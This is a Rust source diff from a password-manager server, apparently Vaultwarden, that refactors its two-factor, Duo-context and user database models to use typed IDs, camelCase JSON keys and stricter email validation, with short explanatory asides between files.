+        let _: () = diesel::delete(twofactor::table.filter(twofactor::user_uuid.eq(&self.user_uuid)).filter(twofactor::atype.eq(&self.atype)))
             .execute(conn)
             .map_res("Error deleting twofactor for insert")?;
 
@@ -118,7 +119,7 @@ impl TwoFactor {
         }}
     }
 
-    pub async fn find_by_user(user_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
+    pub async fn find_by_user(user_uuid: &UserId, conn: &mut DbConn) -> Vec<Self> {
         db_run! { conn: {
             twofactor::table
                 .filter(twofactor::user_uuid.eq(user_uuid))
@@ -129,7 +130,7 @@ impl TwoFactor {
         }}
     }
 
-    pub async fn find_by_user_and_type(user_uuid: &str, atype: i32, conn: &mut DbConn) -> Option<Self> {
+    pub async fn find_by_user_and_type(user_uuid: &UserId, atype: i32, conn: &mut DbConn) -> Option<Self> {
         db_run! { conn: {
             twofactor::table
                 .filter(twofactor::user_uuid.eq(user_uuid))
@@ -140,7 +141,7 @@ impl TwoFactor {
         }}
     }
 
-    pub async fn delete_all_by_user(user_uuid: &str, conn: &mut DbConn) -> EmptyResult {
+    pub async fn delete_all_by_user(user_uuid: &UserId, conn: &mut DbConn) -> EmptyResult {
         db_run! { conn: {
             diesel::delete(twofactor::table.filter(twofactor::user_uuid.eq(user_uuid)))
                 .execute(conn)
@@ -217,3 +218,6 @@ impl TwoFactor {
         Ok(())
     }
 }
+
+#[derive(Clone, Debug, DieselNewType, FromForm, PartialEq, Eq, Hash, Serialize, Deserialize)]
+pub struct TwoFactorId(String);
src/db/models/two_factor_duo_context.rs (new file, 84 lines):
@@ -0,0 +1,84 @@
+use chrono::Utc;
+
+use crate::{api::EmptyResult, db::DbConn, error::MapResult};
+
+db_object! {
+    #[derive(Identifiable, Queryable, Insertable, AsChangeset)]
+    #[diesel(table_name = twofactor_duo_ctx)]
+    #[diesel(primary_key(state))]
+    pub struct TwoFactorDuoContext {
+        pub state: String,
+        pub user_email: String,
+        pub nonce: String,
+        pub exp: i64,
+    }
+}
+
+impl TwoFactorDuoContext {
+    pub async fn find_by_state(state: &str, conn: &mut DbConn) -> Option<Self> {
+        db_run! {
+            conn: {
+                twofactor_duo_ctx::table
+                    .filter(twofactor_duo_ctx::state.eq(state))
+                    .first::<TwoFactorDuoContextDb>(conn)
+                    .ok()
+                    .from_db()
+            }
+        }
+    }
+
+    pub async fn save(state: &str, user_email: &str, nonce: &str, ttl: i64, conn: &mut DbConn) -> EmptyResult {
+        // A saved context should never be changed, only created or deleted.
+        let exists = Self::find_by_state(state, conn).await;
+        if exists.is_some() {
+            return Ok(());
+        };
+
+        let exp = Utc::now().timestamp() + ttl;
+
+        db_run! {
+            conn: {
+                diesel::insert_into(twofactor_duo_ctx::table)
+                    .values((
+                        twofactor_duo_ctx::state.eq(state),
+                        twofactor_duo_ctx::user_email.eq(user_email),
+                        twofactor_duo_ctx::nonce.eq(nonce),
+                        twofactor_duo_ctx::exp.eq(exp)
+                    ))
+                    .execute(conn)
+                    .map_res("Error saving context to twofactor_duo_ctx")
+            }
+        }
+    }
+
+    pub async fn find_expired(conn: &mut DbConn) -> Vec<Self> {
+        let now = Utc::now().timestamp();
+        db_run! {
+            conn: {
+                twofactor_duo_ctx::table
+                    .filter(twofactor_duo_ctx::exp.lt(now))
+                    .load::<TwoFactorDuoContextDb>(conn)
+                    .expect("Error finding expired contexts in twofactor_duo_ctx")
+                    .from_db()
+            }
+        }
+    }
+
+    pub async fn delete(&self, conn: &mut DbConn) -> EmptyResult {
+        db_run! {
+            conn: {
+                diesel::delete(
+                    twofactor_duo_ctx::table
+                        .filter(twofactor_duo_ctx::state.eq(&self.state)))
+                    .execute(conn)
+                    .map_res("Error deleting from twofactor_duo_ctx")
+            }
+        }
+    }
+
+    pub async fn purge_expired_duo_contexts(conn: &mut DbConn) {
+        for context in Self::find_expired(conn).await {
+            context.delete(conn).await.ok();
+        }
+    }
+}
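The new table's lifecycle is append-and-expire: save() refuses to overwrite an existing state, each row carries an absolute expiry (exp = now + ttl), and the purge deletes rows whose exp has passed. An in-memory sketch of the same expiry rule (chrono only, with a plain Vec standing in for the table):

use chrono::Utc;

struct DuoContext {
    state: String,
    exp: i64, // absolute unix timestamp: now + ttl at save time
}

// Keep only contexts whose expiry is still in the future, as the
// SQL filter `exp < now` plus delete does above.
fn purge_expired(contexts: &mut Vec<DuoContext>) {
    let now = Utc::now().timestamp();
    contexts.retain(|c| c.exp >= now);
}

fn main() {
    let now = Utc::now().timestamp();
    let mut contexts = vec![
        DuoContext { state: "fresh".into(), exp: now + 300 },
        DuoContext { state: "stale".into(), exp: now - 1 },
    ];
    purge_expired(&mut contexts);
    assert_eq!(contexts.len(), 1);
    assert_eq!(contexts[0].state, "fresh");
}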
src/db/models/two_factor_incomplete.rs:
@@ -1,18 +1,28 @@
 use chrono::{NaiveDateTime, Utc};
 
-use crate::{api::EmptyResult, auth::ClientIp, db::DbConn, error::MapResult, CONFIG};
+use crate::{
+    api::EmptyResult,
+    auth::ClientIp,
+    db::{
+        models::{DeviceId, UserId},
+        DbConn,
+    },
+    error::MapResult,
+    CONFIG,
+};
 
 db_object! {
     #[derive(Identifiable, Queryable, Insertable, AsChangeset)]
     #[diesel(table_name = twofactor_incomplete)]
     #[diesel(primary_key(user_uuid, device_uuid))]
     pub struct TwoFactorIncomplete {
-        pub user_uuid: String,
+        pub user_uuid: UserId,
         // This device UUID is simply what's claimed by the device. It doesn't
         // necessarily correspond to any UUID in the devices table, since a device
         // must complete 2FA login before being added into the devices table.
-        pub device_uuid: String,
+        pub device_uuid: DeviceId,
         pub device_name: String,
+        pub device_type: i32,
         pub login_time: NaiveDateTime,
         pub ip_address: String,
     }
@@ -20,9 +30,10 @@ db_object! {
 
 impl TwoFactorIncomplete {
     pub async fn mark_incomplete(
-        user_uuid: &str,
-        device_uuid: &str,
+        user_uuid: &UserId,
+        device_uuid: &DeviceId,
         device_name: &str,
+        device_type: i32,
         ip: &ClientIp,
         conn: &mut DbConn,
     ) -> EmptyResult {
@@ -44,6 +55,7 @@ impl TwoFactorIncomplete {
                     twofactor_incomplete::user_uuid.eq(user_uuid),
                     twofactor_incomplete::device_uuid.eq(device_uuid),
                     twofactor_incomplete::device_name.eq(device_name),
+                    twofactor_incomplete::device_type.eq(device_type),
                     twofactor_incomplete::login_time.eq(Utc::now().naive_utc()),
                     twofactor_incomplete::ip_address.eq(ip.ip.to_string()),
                 ))
@@ -52,7 +64,7 @@ impl TwoFactorIncomplete {
         }}
     }
 
-    pub async fn mark_complete(user_uuid: &str, device_uuid: &str, conn: &mut DbConn) -> EmptyResult {
+    pub async fn mark_complete(user_uuid: &UserId, device_uuid: &DeviceId, conn: &mut DbConn) -> EmptyResult {
         if CONFIG.incomplete_2fa_time_limit() <= 0 || !CONFIG.mail_enabled() {
             return Ok(());
         }
@@ -60,7 +72,11 @@ impl TwoFactorIncomplete {
         Self::delete_by_user_and_device(user_uuid, device_uuid, conn).await
     }
 
-    pub async fn find_by_user_and_device(user_uuid: &str, device_uuid: &str, conn: &mut DbConn) -> Option<Self> {
+    pub async fn find_by_user_and_device(
+        user_uuid: &UserId,
+        device_uuid: &DeviceId,
+        conn: &mut DbConn,
+    ) -> Option<Self> {
         db_run! { conn: {
             twofactor_incomplete::table
                 .filter(twofactor_incomplete::user_uuid.eq(user_uuid))
@@ -85,7 +101,11 @@ impl TwoFactorIncomplete {
         Self::delete_by_user_and_device(&self.user_uuid, &self.device_uuid, conn).await
     }
 
-    pub async fn delete_by_user_and_device(user_uuid: &str, device_uuid: &str, conn: &mut DbConn) -> EmptyResult {
+    pub async fn delete_by_user_and_device(
+        user_uuid: &UserId,
+        device_uuid: &DeviceId,
+        conn: &mut DbConn,
+    ) -> EmptyResult {
         db_run! { conn: {
             diesel::delete(twofactor_incomplete::table
                 .filter(twofactor_incomplete::user_uuid.eq(user_uuid))
@@ -95,7 +115,7 @@ impl TwoFactorIncomplete {
         }}
     }
 
-    pub async fn delete_all_by_user(user_uuid: &str, conn: &mut DbConn) -> EmptyResult {
+    pub async fn delete_all_by_user(user_uuid: &UserId, conn: &mut DbConn) -> EmptyResult {
         db_run! { conn: {
             diesel::delete(twofactor_incomplete::table.filter(twofactor_incomplete::user_uuid.eq(user_uuid)))
                 .execute(conn)
src/db/models/user.rs:
@@ -1,8 +1,19 @@
-use chrono::{Duration, NaiveDateTime, Utc};
+use chrono::{NaiveDateTime, TimeDelta, Utc};
+use derive_more::{AsRef, Deref, Display, From};
 use serde_json::Value;
 
-use crate::crypto;
-use crate::CONFIG;
+use super::{
+    Cipher, Device, EmergencyAccess, Favorite, Folder, Membership, MembershipType, TwoFactor, TwoFactorIncomplete,
+};
+use crate::{
+    api::EmptyResult,
+    crypto,
+    db::DbConn,
+    error::MapResult,
+    util::{format_date, get_uuid, retry},
+    CONFIG,
+};
+use macros::UuidFromParam;
 
 db_object! {
     #[derive(Identifiable, Queryable, Insertable, AsChangeset)]
@@ -10,7 +21,7 @@ db_object! {
     #[diesel(treat_none_as_null = true)]
     #[diesel(primary_key(uuid))]
     pub struct User {
-        pub uuid: String,
+        pub uuid: UserId,
         pub enabled: bool,
         pub created_at: NaiveDateTime,
         pub updated_at: NaiveDateTime,
@@ -90,7 +101,7 @@ impl User {
         let email = email.to_lowercase();
 
         Self {
-            uuid: crate::util::get_uuid(),
+            uuid: UserId(get_uuid()),
             enabled: true,
             created_at: now,
             updated_at: now,
@@ -107,7 +118,7 @@ impl User {
             salt: crypto::get_random_bytes::<64>().to_vec(),
             password_iterations: CONFIG.password_iterations(),
 
-            security_stamp: crate::util::get_uuid(),
+            security_stamp: get_uuid(),
             stamp_exception: None,
 
             password_hint: None,
@@ -144,14 +155,14 @@ impl User {
 
     pub fn check_valid_recovery_code(&self, recovery_code: &str) -> bool {
         if let Some(ref totp_recover) = self.totp_recover {
-            crate::crypto::ct_eq(recovery_code, totp_recover.to_lowercase())
+            crypto::ct_eq(recovery_code, totp_recover.to_lowercase())
        } else {
            false
        }
    }
 
     pub fn check_valid_api_key(&self, key: &str) -> bool {
-        matches!(self.api_key, Some(ref api_key) if crate::crypto::ct_eq(api_key, key))
+        matches!(self.api_key, Some(ref api_key) if crypto::ct_eq(api_key, key))
     }
 
     /// Set the password hash generated
@@ -162,8 +173,8 @@ impl User {
     /// * `password` - A str which contains a hashed version of the users master password.
     /// * `new_key` - A String which contains the new aKey value of the users master password.
     /// * `allow_next_route` - A Option<Vec<String>> with the function names of the next allowed (rocket) routes.
     ///   These routes are able to use the previous stamp id for the next 2 minutes.
     ///   After these 2 minutes this stamp will expire.
     ///
     pub fn set_password(
         &mut self,
@@ -188,21 +199,21 @@ impl User {
     }
 
     pub fn reset_security_stamp(&mut self) {
-        self.security_stamp = crate::util::get_uuid();
+        self.security_stamp = get_uuid();
     }
 
     /// Set the stamp_exception to only allow a subsequent request matching a specific route using the current security-stamp.
     ///
     /// # Arguments
     /// * `route_exception` - A Vec<String> with the function names of the next allowed (rocket) routes.
     ///   These routes are able to use the previous stamp id for the next 2 minutes.
     ///   After these 2 minutes this stamp will expire.
     ///
     pub fn set_stamp_exception(&mut self, route_exception: Vec<String>) {
         let stamp_exception = UserStampException {
             routes: route_exception,
             security_stamp: self.security_stamp.clone(),
-            expire: (Utc::now().naive_utc() + Duration::minutes(2)).timestamp(),
+            expire: (Utc::now() + TimeDelta::try_minutes(2).unwrap()).timestamp(),
         };
         self.stamp_exception = Some(serde_json::to_string(&stamp_exception).unwrap_or_default());
     }
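The expire computation switches from chrono's panicking Duration::minutes to TimeDelta::try_minutes, which returns an Option and only fails if the value would overflow the TimeDelta range; two minutes never can, so the unwrap() is safe. A standalone sketch (chrono 0.4.34 or newer assumed):

use chrono::{TimeDelta, Utc};

fn main() {
    // try_minutes(2) is always Some, hence the unwrap() mirrors the diff.
    let expire = (Utc::now() + TimeDelta::try_minutes(2).unwrap()).timestamp();
    println!("stamp exception expires at unix time {expire}");
}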
@@ -213,20 +224,11 @@ impl User {
     }
 }
 
-use super::{
-    Cipher, Device, EmergencyAccess, Favorite, Folder, Send, TwoFactor, TwoFactorIncomplete, UserOrgType,
-    UserOrganization,
-};
-use crate::db::DbConn;
-
-use crate::api::EmptyResult;
-use crate::error::MapResult;
-
 /// Database methods
 impl User {
     pub async fn to_json(&self, conn: &mut DbConn) -> Value {
         let mut orgs_json = Vec::new();
-        for c in UserOrganization::find_confirmed_by_user(&self.uuid, conn).await {
+        for c in Membership::find_confirmed_by_user(&self.uuid, conn).await {
             orgs_json.push(c.to_json(conn).await);
         }
 
@@ -240,30 +242,32 @@ impl User {
         };
 
         json!({
-            "_Status": status as i32,
-            "Id": self.uuid,
-            "Name": self.name,
-            "Email": self.email,
-            "EmailVerified": !CONFIG.mail_enabled() || self.verified_at.is_some(),
-            "Premium": true,
-            "MasterPasswordHint": self.password_hint,
-            "Culture": "en-US",
-            "TwoFactorEnabled": twofactor_enabled,
-            "Key": self.akey,
-            "PrivateKey": self.private_key,
-            "SecurityStamp": self.security_stamp,
-            "Organizations": orgs_json,
-            "Providers": [],
-            "ProviderOrganizations": [],
-            "ForcePasswordReset": false,
-            "AvatarColor": self.avatar_color,
-            "Object": "profile",
+            "_status": status as i32,
+            "id": self.uuid,
+            "name": self.name,
+            "email": self.email,
+            "emailVerified": !CONFIG.mail_enabled() || self.verified_at.is_some(),
+            "premium": true,
+            "premiumFromOrganization": false,
+            "culture": "en-US",
+            "twoFactorEnabled": twofactor_enabled,
+            "key": self.akey,
+            "privateKey": self.private_key,
+            "securityStamp": self.security_stamp,
+            "organizations": orgs_json,
+            "providers": [],
+            "providerOrganizations": [],
+            "forcePasswordReset": false,
+            "avatarColor": self.avatar_color,
+            "usesKeyConnector": false,
+            "creationDate": format_date(&self.created_at),
+            "object": "profile",
         })
     }
 
     pub async fn save(&mut self, conn: &mut DbConn) -> EmptyResult {
-        if self.email.trim().is_empty() {
-            err!("User email can't be empty")
+        if !crate::util::is_valid_email(&self.email) {
+            err!(format!("User email {} is not a valid email address", self.email))
         }
 
         self.updated_at = Utc::now().naive_utc();
@@ -300,18 +304,18 @@ impl User {
     }
 
     pub async fn delete(self, conn: &mut DbConn) -> EmptyResult {
-        for user_org in UserOrganization::find_confirmed_by_user(&self.uuid, conn).await {
-            if user_org.atype == UserOrgType::Owner
-                && UserOrganization::count_confirmed_by_org_and_type(&user_org.org_uuid, UserOrgType::Owner, conn).await
-                    <= 1
+        for member in Membership::find_confirmed_by_user(&self.uuid, conn).await {
+            if member.atype == MembershipType::Owner
+                && Membership::count_confirmed_by_org_and_type(&member.org_uuid, MembershipType::Owner, conn).await <= 1
             {
                 err!("Can't delete last owner")
             }
         }
 
-        Send::delete_all_by_user(&self.uuid, conn).await?;
+        super::Send::delete_all_by_user(&self.uuid, conn).await?;
         EmergencyAccess::delete_all_by_user(&self.uuid, conn).await?;
-        UserOrganization::delete_all_by_user(&self.uuid, conn).await?;
+        EmergencyAccess::delete_all_by_grantee_email(&self.email, conn).await?;
+        Membership::delete_all_by_user(&self.uuid, conn).await?;
         Cipher::delete_all_by_user(&self.uuid, conn).await?;
         Favorite::delete_all_by_user(&self.uuid, conn).await?;
         Folder::delete_all_by_user(&self.uuid, conn).await?;
@@ -327,9 +331,9 @@ impl User {
         }}
     }
 
-    pub async fn update_uuid_revision(uuid: &str, conn: &mut DbConn) {
+    pub async fn update_uuid_revision(uuid: &UserId, conn: &mut DbConn) {
         if let Err(e) = Self::_update_revision(uuid, &Utc::now().naive_utc(), conn).await {
-            warn!("Failed to update revision for {}: {:#?}", uuid, e);
+            warn!("Failed to update revision for {uuid}: {e:#?}");
        }
     }
 
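The warn! rewrite uses inline format arguments (stable since Rust 1.58), which capture in-scope variables by name; `{e:#?}` combines the capture with the alternate Debug formatter. For example:

fn main() {
    let uuid = "0a24a066-42d4-41ae-9d96-5f11261d6a48";
    let e = std::io::Error::new(std::io::ErrorKind::Other, "database is locked");
    // Equivalent to the old "{}: {:#?}" with uuid and e as trailing args.
    println!("Failed to update revision for {uuid}: {e:#?}");
}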
@@ -337,7 +341,7 @@ impl User {
         let updated_at = Utc::now().naive_utc();
 
         db_run! {conn: {
-            crate::util::retry(|| {
+            retry(|| {
                 diesel::update(users::table)
                     .set(users::updated_at.eq(updated_at))
                     .execute(conn)
@@ -352,9 +356,9 @@ impl User {
         Self::_update_revision(&self.uuid, &self.updated_at, conn).await
     }
 
-    async fn _update_revision(uuid: &str, date: &NaiveDateTime, conn: &mut DbConn) -> EmptyResult {
+    async fn _update_revision(uuid: &UserId, date: &NaiveDateTime, conn: &mut DbConn) -> EmptyResult {
         db_run! {conn: {
-            crate::util::retry(|| {
+            retry(|| {
                 diesel::update(users::table.filter(users::uuid.eq(uuid)))
                     .set(users::updated_at.eq(date))
                     .execute(conn)
@@ -374,7 +378,7 @@ impl User {
         }}
     }
 
-    pub async fn find_by_uuid(uuid: &str, conn: &mut DbConn) -> Option<Self> {
+    pub async fn find_by_uuid(uuid: &UserId, conn: &mut DbConn) -> Option<Self> {
         db_run! {conn: {
             users::table.filter(users::uuid.eq(uuid)).first::<UserDb>(conn).ok().from_db()
         }}
@@ -403,8 +407,8 @@ impl Invitation {
     }
 
     pub async fn save(&self, conn: &mut DbConn) -> EmptyResult {
-        if self.email.trim().is_empty() {
-            err!("Invitation email can't be empty")
+        if !crate::util::is_valid_email(&self.email) {
+            err!(format!("Invitation email {} is not a valid email address", self.email))
        }
 
         db_run! {conn:
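Both save paths now call crate::util::is_valid_email instead of only rejecting the empty string. The diff does not show that helper's body, so the following is a hypothetical stand-in (the real check may be stricter) that illustrates the strictly wider validation:

// Hypothetical stand-in for crate::util::is_valid_email, for illustration only.
fn is_valid_email(email: &str) -> bool {
    let Some((local, domain)) = email.split_once('@') else {
        return false;
    };
    !local.is_empty() && domain.contains('.') && !domain.starts_with('.') && !domain.ends_with('.')
}

fn main() {
    assert!(is_valid_email("user@example.com"));
    assert!(!is_valid_email("")); // the old guard only caught this case
    assert!(!is_valid_email("user@nodot"));
}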
@@ -453,3 +457,23 @@ impl Invitation {
         }
     }
 }
+
+#[derive(
+    Clone,
+    Debug,
+    DieselNewType,
+    FromForm,
+    PartialEq,
+    Eq,
+    Hash,
+    Serialize,
+    Deserialize,
+    AsRef,
+    Deref,
+    Display,
+    From,
+    UuidFromParam,
+)]
+#[deref(forward)]
+#[from(forward)]
+pub struct UserId(String);
(Some files were not shown because too many files have changed in this diff.)